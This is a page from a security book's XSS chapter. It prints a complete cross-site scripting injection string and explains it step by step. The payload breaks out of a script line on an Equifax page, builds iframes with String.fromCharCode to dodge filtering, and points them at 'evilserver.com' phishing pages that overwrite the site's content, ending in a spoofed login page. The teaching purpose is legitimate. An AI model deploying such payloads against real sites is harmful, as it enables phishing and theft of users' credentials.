436_XSS_06.qxd
4/20/07
10:51 AM
Page 231
XSS Exploited • Chapter 6
231
phisher is that an iframe leaves a trail, which means the phisher will have to upload the target page for the iframe to a server that will not lead back to the identity of the phisher. The complete injection code looks as follows. We added line breaks for readability. '; iframe=String.fromCharCode(60)+ _'iframe src=http://evilserver.com/tequifax.htm _width=100% frameborder=0 scrolling=no'+String.fromCharCode(62); rightcolumn=String.fromCharCode(60)+'iframe _src=http://evilsite.com/tests/equifax2.htmwidth=100% _frameborder=0 scrolling=no height=400'+String.fromCharCode(62); document.getElementById('content').innerHTML=iframe; document.getElementById('rightcol').innerHTML=rightcolumn; test='asdf
This string first closes the JavaScript line that we are injecting the code into on Equifax’s Web page.Then we create a variable named iframe that holds the HTML characters needed to create an iframe pointing to our evilsever.com. Next, we create a variable named rightcolumn that holds the HTML needed to provide a “New User” part of the spoofed page. Note that we are using the String.fromCharCode() function to create the < and > characters. Finally, we overwrite the existing HTML content of the ‘content’ and ‘rightcol’ div areas of the existing Web page with the content in iframe and rightcol, which loads the iframe contents inside the target div tag areas.The end result looks like Figure 6.5.
Figure 6.5 Spoofed Equifax Page
www.syngress.com